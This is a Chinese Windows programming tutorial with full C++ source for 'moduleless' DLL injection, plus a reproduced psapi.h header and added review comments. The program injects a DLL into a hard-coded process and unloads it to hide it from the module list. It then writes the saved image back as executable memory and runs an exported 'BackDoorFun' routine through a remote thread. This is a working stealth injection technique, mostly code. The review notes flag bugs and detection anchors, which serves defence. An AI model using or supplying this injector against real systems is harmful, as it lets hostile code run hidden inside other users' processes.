基于visual c++之windows核心编程代码分析(63)无模块dll进程注射
我们在信息安全编程的时候经常需要进行 DLL 进程注入,那么在编程中如何实现呢?
需要引用 Psapi.Lib(可通过百度搜索下载),其头文件如下:
/*++

Module Name:

    psapi.h

Abstract:

    Include file for APIs provided by PSAPI.DLL

Author:

    Richard Shupak   [richards]  06-Jan-1994

Revision History:

--*/

/*
 * NOTE(review): this is a 1994-era copy of the header as reproduced by the
 * article. The Windows SDK ships its own psapi.h / psapi.lib; prefer linking
 * against those over a copy downloaded from a third-party site.
 * Also note that the GetMappedFilenameEx macros below expand to
 * GetMappedFilenameExW / GetMappedFilenameExA, neither of which is declared in
 * this header (the prototypes above them are GetMappedFileNameW / A).
 */

#ifndef _PSAPI_H_
#define _PSAPI_H_

#ifdef __cplusplus
extern "C" {
#endif

/* Process enumeration: fills lpidProcess with PIDs, cbNeeded with bytes used. */
BOOL
WINAPI
EnumProcesses(
    DWORD * lpidProcess,
    DWORD cb,
    DWORD * cbNeeded
    );

/* Module enumeration for one process: fills lphModule with HMODULEs. */
BOOL
WINAPI
EnumProcessModules(
    HANDLE hProcess,
    HMODULE *lphModule,
    DWORD cb,
    LPDWORD lpcbNeeded
    );

DWORD
WINAPI
GetModuleBaseNameA(
    HANDLE hProcess,
    HMODULE hModule,
    LPSTR lpBaseName,
    DWORD nSize
    );

DWORD
WINAPI
GetModuleBaseNameW(
    HANDLE hProcess,
    HMODULE hModule,
    LPWSTR lpBaseName,
    DWORD nSize
    );

#ifdef UNICODE
#define GetModuleBaseName GetModuleBaseNameW
#else
#define GetModuleBaseName GetModuleBaseNameA
#endif // !UNICODE

DWORD
WINAPI
GetModuleFileNameExA(
    HANDLE hProcess,
    HMODULE hModule,
    LPSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetModuleFileNameExW(
    HANDLE hProcess,
    HMODULE hModule,
    LPWSTR lpFilename,
    DWORD nSize
    );

#ifdef UNICODE
#define GetModuleFileNameEx GetModuleFileNameExW
#else
#define GetModuleFileNameEx GetModuleFileNameExA
#endif // !UNICODE

/* Base address, image size and entry point of one module. */
typedef struct _MODULEINFO {
    LPVOID lpBaseOfDll;
    DWORD SizeOfImage;
    LPVOID EntryPoint;
} MODULEINFO, *LPMODULEINFO;

BOOL
WINAPI
GetModuleInformation(
    HANDLE hProcess,
    HMODULE hModule,
    LPMODULEINFO lpmodinfo,
    DWORD cb
    );

BOOL
WINAPI
EmptyWorkingSet(
    HANDLE hProcess
    );

BOOL
WINAPI
QueryWorkingSet(
    HANDLE hProcess,
    PVOID pv,
    DWORD cb
    );

BOOL
WINAPI
InitializeProcessForWsWatch(
    HANDLE hProcess
    );

/* One working-set fault record: faulting instruction and faulting address. */
typedef struct _PSAPI_WS_WATCH_INFORMATION {
    LPVOID FaultingPc;
    LPVOID FaultingVa;
} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;

BOOL
WINAPI
GetWsChanges(
    HANDLE hProcess,
    PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,
    DWORD cb
    );

DWORD
WINAPI
GetMappedFileNameW(
    HANDLE hProcess,
    LPVOID lpv,
    LPWSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetMappedFileNameA(
    HANDLE hProcess,
    LPVOID lpv,
    LPSTR lpFilename,
    DWORD nSize
    );

/* See the NOTE(review) at the top: these names do not match the prototypes above. */
#ifdef UNICODE
#define GetMappedFilenameEx GetMappedFilenameExW
#else
#define GetMappedFilenameEx GetMappedFilenameExA
#endif // !UNICODE

BOOL
WINAPI
EnumDeviceDrivers(
    LPVOID *lpImageBase,
    DWORD cb,
    LPDWORD lpcbNeeded
    );

DWORD
WINAPI
GetDeviceDriverBaseNameA(
    LPVOID ImageBase,
    LPSTR lpBaseName,
    DWORD nSize
    );

DWORD
WINAPI
GetDeviceDriverBaseNameW(
    LPVOID ImageBase,
    LPWSTR lpBaseName,
    DWORD nSize
    );

#ifdef UNICODE
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameW
#else
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameA
#endif // !UNICODE

DWORD
WINAPI
GetDeviceDriverFileNameA(
    LPVOID ImageBase,
    LPSTR lpFilename,
    DWORD nSize
    );

DWORD
WINAPI
GetDeviceDriverFileNameW(
    LPVOID ImageBase,
    LPWSTR lpFilename,
    DWORD nSize
    );

#ifdef UNICODE
#define GetDeviceDriverFileName GetDeviceDriverFileNameW
#else
#define GetDeviceDriverFileName GetDeviceDriverFileNameA
#endif // !UNICODE

// Structure for GetProcessMemoryInfo()
typedef struct _PROCESS_MEMORY_COUNTERS {
    DWORD cb;
    DWORD PageFaultCount;
    DWORD PeakWorkingSetSize;
    DWORD WorkingSetSize;
    DWORD QuotaPeakPagedPoolUsage;
    DWORD QuotaPagedPoolUsage;
    DWORD QuotaPeakNonPagedPoolUsage;
    DWORD QuotaNonPagedPoolUsage;
    DWORD PagefileUsage;
    DWORD PeakPagefileUsage;
} PROCESS_MEMORY_COUNTERS;
typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;

BOOL
WINAPI
GetProcessMemoryInfo(
    HANDLE Process,
    PPROCESS_MEMORY_COUNTERS ppsmemCounters,
    DWORD cb
    );

#ifdef __cplusplus
}
#endif

#endif
无模块 DLL 进程注入的实现请见下列代码与分析:
#include "stdafx.h"
#include "windows.h"
#include "stdio.h"
#include "Psapi.h"
#include "Tlhelp32.h"

// What this program does ("moduleless DLL injection" in the article's terms),
// in the order main() performs it:
//   1. OpenProcess(PROCESS_ALL_ACCESS) on a hard-coded PID;
//   2. classic LoadLibraryA injection (InjectRemoteProcess);
//   3. find the loaded DLL via a Toolhelp module snapshot (GetThreadInformation);
//   4. copy its whole in-memory image out with ReadProcessMemory;
//   5. FreeLibrary it through a second remote thread (UnistallDll);
//   6. VirtualAllocEx at the old module base and write the saved image back;
//   7. CreateRemoteThread at base + BackDoorFun (the RVA of an exported function).
// After step 5 the loader no longer lists the DLL as a module, yet its code runs
// again after step 7. Presumably the same base is requested in step 6 because
// the copied image has its imports/relocations resolved for that base.
//
// NOTE(review): the artefacts this sequence necessarily leaves are the useful
// detection anchors -- VirtualAllocEx with PAGE_EXECUTE_READWRITE plus
// WriteProcessMemory into another process, and three CreateRemoteThread calls
// whose start addresses are kernel32!LoadLibraryA, kernel32!FreeLibrary and,
// finally, an address inside private executable memory that no image file
// backs. That last thread is the distinctive one.

// Looks up, in ProcessID's module list, the module whose full path equals
// Dllfullname. Despite its name and the parameter's name this enumerates
// modules, not threads: `Thread` is a MODULEENTRY32 and on success receives the
// module's base address (modBaseAddr) and image size (modBaseSize). The caller
// must set Thread.dwSize beforehand (main() does). Returns TRUE only if the last
// entry visited matches; FALSE if the snapshot or the first entry fails.
// NOTE(review): hthSnapshot is never closed on any path (handle leak).
BOOL GetThreadInformation(DWORD ProcessID,char* Dllfullname,MODULEENTRY32 &Thread)
{
    HANDLE hthSnapshot = NULL;
    // Snapshot of every module mapped in the target process.
    hthSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID);
    if (hthSnapshot == NULL) return FALSE;
    // First entry of the module list.
    BOOL bMoreMods = Module32First(hthSnapshot, &Thread);
    if (bMoreMods == FALSE)return FALSE;
    // Walk the list until the full path matches.
    for (;bMoreMods; bMoreMods = Module32Next(hthSnapshot, &Thread))
    {
        if (strcmp(Thread.szExePath, Dllfullname) == 0)break;
    }
    // Re-checked because the loop also ends when Module32Next runs out of entries.
    if (strcmp(Thread.szExePath, Dllfullname) == 0)return TRUE;
    else
        return FALSE;
}

// Enables the privilege named lpPrivilegeName on the token of hProcess.
// NOTE(review): main() passes the *remote* process handle, and only after
// OpenProcess has already succeeded, so the SE_DEBUG_NAME adjustment made here
// cannot have helped that OpenProcess call and does not touch the injector's own
// token. AdjustTokenPrivileges also reports success when the privilege is not
// held at all (GetLastError() == ERROR_NOT_ALL_ASSIGNED), which is not checked.
// hToken is never closed (handle leak).
BOOL AdjustPrivileges(HANDLE hProcess,LPCTSTR lpPrivilegeName)
{
    //******************************************************
    // Adjust token privileges
    //******************************************************
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;
    // Open the process token with adjust + query rights.
    if (!::OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return FALSE;
    // Resolve the LUID of lpPrivilegeName on the local system.
    if(!::LookupPrivilegeValue(NULL, lpPrivilegeName, &tkp.Privileges[0].Luid)) return FALSE;
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if(!::AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0)) return FALSE;
    return TRUE;
}

// Classic LoadLibrary injection: writes the DLL's full path into hProcess and
// starts a remote thread at kernel32!LoadLibraryA with that buffer as argument.
// Relies on kernel32.dll being mapped at the same address in both processes, so
// the locally resolved GetProcAddress result is valid in the target. Returns
// TRUE as soon as the remote thread exists -- it is neither waited on nor closed,
// so the caller cannot know whether LoadLibraryA has finished (main() papers
// over this with Sleep(300)). The path buffer is allocated
// PAGE_EXECUTE_READWRITE and is never freed in the target.
BOOL InjectRemoteProcess(HANDLE hProcess,char* Dllfullname)
{
    // Reserve+commit room in the target for the NUL-terminated DLL path.
    PSTR pDllName=NULL;
    if((pDllName=(PSTR)::VirtualAllocEx(hProcess,NULL,strlen(Dllfullname)+1,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)return FALSE;
    BOOL writecode;
    if((writecode=::WriteProcessMemory(hProcess,pDllName, Dllfullname,strlen(Dllfullname)+1,NULL))==0)return FALSE;
    // Address of LoadLibraryA in Kernel32.dll (resolved in this process).
    PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
    if (pfnThreadRtn== NULL)return FALSE;
    // Start the remote thread.
    HANDLE hRemoteThread=NULL;
    if((hRemoteThread=::CreateRemoteThread(hProcess,NULL,0, pfnThreadRtn,pDllName, // LoadLibraryA's single argument: the path string's address inside the target (several arguments would have to go in a struct)
        0,NULL))==NULL)return FALSE;
    return TRUE;
}

// Runs kernel32!FreeLibrary inside hProcess with Address (the module base, i.e.
// its HMODULE) as the argument and waits for the remote thread to finish.
// Only the thread's creation is checked; FreeLibrary's own result (the thread's
// exit code) is never read, so a module that stays referenced goes unnoticed.
BOOL UnistallDll(HANDLE hProcess,BYTE * Address)
{
    // Address of FreeLibrary in Kernel32.dll (resolved in this process).
    HANDLE hThread = NULL;
    PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle("Kernel32.dll"), "FreeLibrary");
    if (pfnThreadRtn == NULL)return FALSE;
    // Remote thread that executes FreeLibrary(Address).
    hThread = ::CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, Address, 0, NULL);
    if (hThread == NULL) return FALSE;
    // Block until the remote thread terminates.
    ::WaitForSingleObject(hThread, INFINITE);
    // Release the thread handle.
    ::CloseHandle(hThread);
    return TRUE;
}

// Both values are specific to the author's build and machine: the target's PID
// and the RVA (offset from the module base) of the exported function in dll.dll.
#define pid 3844
#define BackDoorFun 0x1014 // RVA of the exported function inside the DLL module

// Entry point; see the file header for the overall sequence. Every failure
// prints a message and returns 0, and nothing acquired along the way
// (hRemoteProcess, buffer, the remote allocations) is ever released.
int main(int argc, char* argv[])
{
    char Dllfullname[255];
    char Dllname[255];
    // Open the target with full access rights.
    HANDLE hRemoteProcess=NULL;
    if((hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))==NULL)
    {
        printf("OpenProcess faile!!");
        return 0;
    }
    // Adjusts the *target's* token, after OpenProcess already succeeded (see AdjustPrivileges).
    BOOL Adjust=AdjustPrivileges(hRemoteProcess,SE_DEBUG_NAME);
    if(Adjust==FALSE)
    {
        printf("Adjust process Privileges faile!!\n");
        return 0;
    }
    // Build the DLL's full path: <current directory>\dll.dll.
    // NOTE(review): GetCurrentDirectory is capped at 255 characters but the two
    // strcat calls are not, so a directory path longer than ~246 characters
    // overflows Dllfullname; a path that does not fit leaves it uninitialised.
    strcpy(Dllname,"dll.dll");
    ::GetCurrentDirectory(255,Dllfullname);
    strcat(Dllfullname,"\\");
    strcat(Dllfullname,Dllname);
    BOOL Res=InjectRemoteProcess(hRemoteProcess,Dllfullname);
    if(Res==FALSE)
    {
        printf("Inject Faile!!\n");
        return 0;
    }
    // Fixed delay for the remote LoadLibraryA to complete; otherwise the module
    // is not yet visible in the snapshot. The remote thread itself is not waited on.
    ::Sleep(300);
    // Holds GetThreadInformation's BOOL result, not an address, despite the name.
    DWORD RemoteTheadAddress=0;
    MODULEENTRY32 Thread = {sizeof(Thread)};;
    RemoteTheadAddress=GetThreadInformation(pid,Dllfullname,Thread);
    if(RemoteTheadAddress==0)
    {
        printf("Get RemoteTheadAddress Faile!!\n");
        return 0;
    }
    // Copy the loaded DLL's whole in-memory image into a local buffer
    // (never deleted; ReadProcessMemory's return value is not checked).
    char *buffer=new char[Thread.modBaseSize+1];
    DWORD read;
    ::ReadProcessMemory(hRemoteProcess,Thread.modBaseAddr, // base address of the loaded DLL module
        buffer,Thread.modBaseSize, // size of the loaded DLL image
        &read);
    // Unload the DLL so that the loader no longer lists it as a module.
    BOOL Unstall=UnistallDll(hRemoteProcess,Thread.modBaseAddr);
    if(Unstall==FALSE)
    {
        printf("Unistall dll Faile!!!\n");
        return 0;
    }
    // Re-allocate at the *original* module base, as the article stresses;
    // presumably because the saved image was fixed up for that base.
    LPVOID Alloc;
    Alloc=::VirtualAllocEx(hRemoteProcess,Thread.modBaseAddr,Thread.modBaseSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if(Alloc== NULL)
    {
        printf("VirtualAllocEx Failed!!\n");
        return 0;
    }
    // Write the saved image back over the freshly allocated region.
    BOOL Writer;
    DWORD Written;
    Writer=::WriteProcessMemory(hRemoteProcess,Thread.modBaseAddr,buffer,Thread.modBaseSize,&Written);
    if(Writer==0)
    {
        printf("WriteProcessMemory Failed!!\n");
        return 0;
    }
    // Run the exported function from the re-written, module-less image. The
    // thread handle is never closed and the thread is not waited on.
    HANDLE hNewThread=NULL;
    if((hNewThread=::CreateRemoteThread(hRemoteProcess,NULL,0,(PTHREAD_START_ROUTINE)(Thread.modBaseAddr+BackDoorFun), // start address = base of the data written into the target + the export's RVA
        NULL, // argument address for the exported function; this one takes none (an argument would be written into the target the same way as the DLL path)
        0,NULL))==NULL)
    {
        printf("CreateNewThread faile!!\n");
        return 0;
    }
    return 0;
}